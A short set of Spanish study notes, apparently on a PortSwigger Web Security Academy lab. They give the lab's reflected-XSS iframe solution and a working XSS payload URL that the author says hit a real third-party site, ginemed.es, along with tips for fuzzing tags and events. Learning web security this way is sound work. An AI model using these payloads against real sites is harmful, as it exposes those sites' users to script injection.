14 - Reflected XSS into HTML context with most tags and attributes blocked

<iframe src="https://0a9f008204f5b89381d4d524009300ef.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>

Fuzzear por todas las etiquetas, fuzzear por todos los eventos en https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Así es como encontramos el XSS de ginemed:
https://www.ginemed.es/?s=<button+autofocus+onfocusin%3Dalert(1)>test<%2Fbutton>

<button autofocus onfocusin="alert(1)">test</button>

Explicación:

Este código hará que, al cargar la página, el botón automáticamente se enfoque y ejecute la alerta alert(1) debido al evento onfocusin.

onfocus

onfocusin